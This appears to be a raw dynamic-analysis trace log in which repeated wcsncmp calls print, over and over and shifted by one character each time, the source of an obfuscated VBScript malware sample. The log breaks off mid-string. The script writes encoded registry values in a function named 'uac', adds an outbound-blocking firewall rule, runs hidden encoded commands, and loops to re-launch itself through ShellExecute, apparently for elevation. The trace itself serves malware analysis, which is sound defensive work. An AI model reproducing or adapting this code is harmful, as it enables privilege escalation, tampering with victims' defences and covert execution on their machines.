[0226.365] wcsncmp (_String1="DHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.365] wcsncmp (_String1="HDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59 [0226.365] wcsncmp (_String1="DYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.365] wcsncmp (_String1="YDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0226.365] wcsncmp (_String1="DTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = 